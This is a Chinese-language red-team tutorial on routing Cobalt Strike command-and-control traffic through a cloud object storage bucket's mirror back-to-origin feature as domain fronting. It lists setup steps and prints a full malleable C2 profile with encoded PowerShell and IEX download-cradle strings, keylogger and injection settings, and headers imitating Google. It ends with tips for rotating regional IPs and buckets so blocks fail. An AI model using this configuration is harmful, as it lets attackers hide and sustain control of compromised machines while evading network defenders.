01
简要说明
和以往的cdn/云函数做域前置相似,利用oss做前置的只是拓展玩法。
利用到的功能特性:OSS是支持回源到自定义地址的,套在c2前面就可以完成域前置操作。
02
配置方法
1.注册bucket并通过镜像回源功能将流量指向c2服务
2.开启bucket公共读权限(方便c2profile中写请求随机文件的情况)
3.创建aksk每秒删除一次bucket中的文件(避免回源一次oss将文件缓存到bucket中导致不再回源至c2)
4.修改c2profile中http-post中相关配置,改为通过GET发请求,参考如下 (因为oss不支持POST方法,也没法回源到c2 server)
`# default sleep time is 60s``set sleeptime "60000";`` ``# jitter factor 0-99% [randomize callback times]``set jitter "0";`` ``# indicate that this is the default Beacon profile``set sample_name "Cobalt Strike Beacon (Default)";`` ``# this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)``stage {` `set stomppe "false";` `set name "beacon.dll";`` ` `string "%d.%s";` `string "post";` `string "%s%s";` `string "cdn.%x%x.%s";` `string "www6.%x%x.%s";` `string "%s.1%x.%x%x.%s";` `string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x%08x.%x%x.%s";` `string "%s.1%08x%08x.%x%x.%s";` `string "%s.1%08x.%x%x.%s";` `string "api.%x%x.%s";` `string "unknown";` `string "could not run command (w/ token) because of its length of %d bytes!";` `string "could not spawn %s (token): %d";` `string "could not spawn %s: %d";` `string "Could not open process token: %d (%u)";` `string "could not run %s as %s\\%s: %d";` `string "COMSPEC";` `string " /C ";` `string "could not upload file: %d";` `string "could not open %s: %d";` `string "could not get file time: %d";` `string "could not set file time: %d";` `string "127.0.0.1";` `string "Could not connect to pipe (%s): %d";` `string "Could not open service control manager on %s: %d";` `string "Could not create service %s on %s: %d";` `string "Could not start service %s on %s: %d";` `string "Start servicesservices %s on %s";` `string "Could not query service %s on %s: %d";` `string "Could not delete service %s on %s: %d";` `string "SeDebugPrivilege";` `string "SeTcbPrivilege";` `string "SeCreateTokenPrivilege";` `string "SeAssignPrimaryTokenPrivilege";` `string "SeLockMemoryPrivilege";` `string "SeIncreaseQuotaPrivilege";` `string "SeUnsolicitedInputPrivilege";` `string "SeMachineAccountPrivilege";` `string "SeSecurityPrivilege";` `string "SeTakeOwnershipPrivilege";` `string "SeLoadDriverPrivilege";` `string "SeSystemProfilePrivilege";` `string "SeSystemtimePrivilege";` `string "SeProfileSingleProcessPrivilege";` `string "SeIncreaseBasePriorityPrivilege";` `string "SeCreatePagefilePrivilege";` `string "SeCreatePermanentPrivilege";` `string "SeBackupPrivilege";` `string "SeRestorePrivilege";` `string "SeShutdownPrivilege";` `string "SeAuditPrivilege";` `string "SeSystemEnvironmentPrivilege";` `string "SeChangeNotifyPrivilege";` `string "SeRemoteShutdownPrivilege";` `string "SeUndockPrivilege";` `string "SeSyncAgentPrivilege";` `string "SeEnableDelegationPrivilege";` `string "SeManageVolumePrivilege";` `string "Could not create service: %d";` `string "Could not start service: %d";` `string "Failed to impersonate token: %d";` `string "Failed to get token";` `string "IsWow64Process";` `string "kernel32";` `string "Could not open '%s'";` `string "%s\\%s";` `string "copy failed: %d";` `string "move failed: %d";` `string "D 0 %02d-%02d-%02d %02d.%02d.%02d %s";` `string "F %I64d %02d-%02d-%02d %02d.%02d.%02d %s";` `string "Wow64DisableWow64FsRedirection";` `string "Wow64RevertWow64FsRedirection";` `string "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.";` `string "could not allocate %d bytes in process: %d";` `string "could not write to process memory: %d";` `string "could not adjust permissions in process: %d";` `string "could not create remote thread in %d: %d";` `string "could not open process %d: %d";` `string "%d is an x64 process (can't inject x86 content)";` `string "%d is an x86 process (can't inject x64 content)";` `string "syswow64";` `string "system32";` `string "Could not set PPID to %d: %d";` `string "Could not set PPID to %d";` `string "ntdll";` `string "NtQueueApcThread";` `string "%ld ";` `string "%.2X";` `string "%.2X:";` `string "process";` `string "Could not connect to pipe: %d";` `string "%d %d %s";` `string "Kerberos";` `string "kerberos ticket purge failed: %08x";` `string "kerberos ticket use failed: %08x";` `string "could not connect to pipe: %d";` `string "could not connect to pipe";` `string "Maximum links reached. Disconnect one";` `string "%d %d %d.%d %s %s %s %d %d";` `string "Could not bind to %d";` `string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')";` `string "%%IMPORT%%";` `string "Command length (%d) too long";` `string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s";` `string "powershell -nop -exec bypass -EncodedCommand \"%s\"";` `string "?%s=%s";` `string "%s and %s = %s";` `string "%s%s: %s";` `string "%s&%s";` `string "%s%s";` `string "Could not kill %d: %d";` `string "%s %d %d";` `string "%s %d %d %s %s %d";` `string "%s\\*";` `string "sha256";` `string "abcdefghijklmnop";` `string "sprng";` `string "could not create pipe: %d";` `string "I'm already in SMB mode";` `string "%s {admin}";` `string "Could not open process: %d (%u)";` `string "Failed to impersonate token from %d (%u)";` `string "Failed to duplicate primary token for %d (%u)";` `string "Failed to impersonate logged on user %d (%u)";` `string "Could not create token: %d";` `string "HTTP/1.1 200 OK";` `string "Content-Type: application/octet-stream";` `string "Content-Length: %d";` `string "Microsoft Base Cryptographic Provider v1.0";``}`` ``# define indicators for an HTTP GET``http-get {`` ` `set uri "/wiki/doc";`` ` `client {` `metadata {` `base64url;` `prepend "SESSIONID=";` `header "Cookie";` `}` `}`` ` `server {` `header "Server" "nginx/1.10.3 (Ubuntu)";` `header "Content-Type" "application/octet-stream";` `header "Connection" "keep-alive";` `header "Vary" "Accept";` `header "Pragma" "public";` `header "Cache-Control" "no-cache";` `header "Expires" "0";` `header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";`` ` `output {` `mask;` `netbios;` `prepend "data=";` `append "%%";` `print;` `}` `}``}`` ``http-post {` `set uri "/wiki/IMXo";` `set verb "GET";` `client {`` ` `header "Sec-Ch-Ua" "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"";` `header "Sec-Ch-Ua-Mobile" "?0";` `header "Sec-Ch-Ua-Platfrom" "Windows";` `header "Accept" "*/*";` `header "Origin" "Google";` `header "Sec-Fetch-Site" "same-origin";` `header "Sec-Fetch-Mode" "no-cors";` `header "Sec-Fetch-Dest" "empty";` `header "Referer" "https://www.google.com";` `header "Accept-Language" "en-US,en;q=0.9";`` ` `output {` `base64url;` `header "X-Client-Data";`` `` ` `}`` ` `id {` `base64url;` `parameter "ei";` `}` `}`` ` `server {`` ` `header "Content-Type" "text/html; charset=UTF-8";` `header "Bfcache-Opt-In" "unload";` `header "Server" "gws";` `header "X-Xss-Protection" "0";` `header "X-Frame-Origins" "SAMEORIGIN";` `header "Alt-Svc" "h3=\":443\"; ma=2592000,h3-29=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"";`` ` `output {` `netbios;`` prepend "\n";` `prepend "{";` `append "\n";` `append "}";` `print;` `}` `}``}`` ``post-ex {` `set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";` `set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";` ` set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";` `set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";` `set keylogger "SetWindowsHookEx";``}`` ``# define indicators/attributes for a DNS Beacon``dns-beacon {` `# maximum number of bytes to send in a DNS A record request` `set maxdns "255";`` ` `set beacon "";` `set get_A "cdn.";` `set get_AAAA "www6.";` `set get_TXT "api.";` `set put_metadata "www.";` `set put_output "post.";``}`` `
5.配置listener指向bucket
03
上线测试
04
思路拓展
1.和cdn的域前置玩法一样,可以采集各地区oss的指向的ip list,host绑定,随机轮询IP访问,能够规避单个ip被封的情况。
2.注册n个地区的oss bucket,每个地区又注册n个bucket,避免bucket域名被封,不同地区域名天然轮询到的IP就不同,可进一步避免被封。
不用租户之间的bucket指向的ip池上一样的,不会真的有甲方把会把全球oss的ip全封了吧🐶